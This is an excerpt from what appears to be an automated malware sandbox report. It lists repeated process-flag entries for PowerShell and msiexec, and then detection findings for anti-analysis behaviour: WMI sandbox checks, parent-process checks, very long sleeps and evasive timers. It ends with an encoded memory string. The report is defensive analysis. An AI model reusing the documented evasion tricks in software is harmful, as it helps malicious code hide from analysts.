Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6872 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2902 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7646 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1932 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.9 %
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7476 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380 Thread sleep count: 119 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380 Thread sleep time: -357000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380 Thread sleep count: 9860 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380 Thread sleep time: -29580000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_209010F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20906580 FindFirstFileExA, 7_2_20906580
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00418981 memset,GetSystemInfo, 11_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E67C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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